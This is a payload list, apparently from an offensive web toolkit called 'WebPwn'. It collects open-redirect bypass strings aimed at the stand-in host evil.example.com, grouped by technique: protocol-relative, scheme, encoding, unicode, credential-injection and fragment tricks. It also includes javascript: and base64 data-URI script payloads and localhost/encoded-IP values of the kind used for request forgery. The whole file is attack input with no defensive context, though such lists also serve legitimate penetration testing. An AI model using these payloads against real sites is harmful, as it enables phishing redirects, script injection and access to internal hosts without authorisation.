# Open Redirect Payloads — WebPwn Toolkit
# ==========================================

# Direct external
https://evil.example.com
http://evil.example.com
//evil.example.com
//evil.example.com/

# Protocol-relative bypass
///evil.example.com
////evil.example.com
/////evil.example.com

# Scheme bypass
https:evil.example.com
https:/evil.example.com
https;://evil.example.com
HTtps://evil.example.com

# JavaScript scheme
javascript://evil.example.com/%0aalert(1)
javascript:alert(document.domain)

# Tab/newline bypass
//google.com/%09/evil.example.com
/%09/evil.example.com
/\evil.example.com
//\evil.example.com

# Unicode bypass
//evil%E3%80%82example%E3%80%82com
%2F%2Fevil.example.com
%2Fevil.example.com

# Windows-style path
\\evil.example.com
\evil.example.com

# IP-based
http://0177.0.0.1
http://2130706433
http://0x7f000001

# Data URI
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# Credential-injected URL
https://evil.example.com@trusted.com
https://trusted.com@evil.example.com

# Localhost
http://localhost
http://127.0.0.1
http://[::1]

# Encoded slashes
%2F%2Fevil.example.com%2F
%252F%252Fevil.example.com

# Fragment bypass
https://evil.example.com#
https://evil.example.com#trusted.com

# Long redirect chains
https://evil.example.com/redirect?url=https://evil.example.com
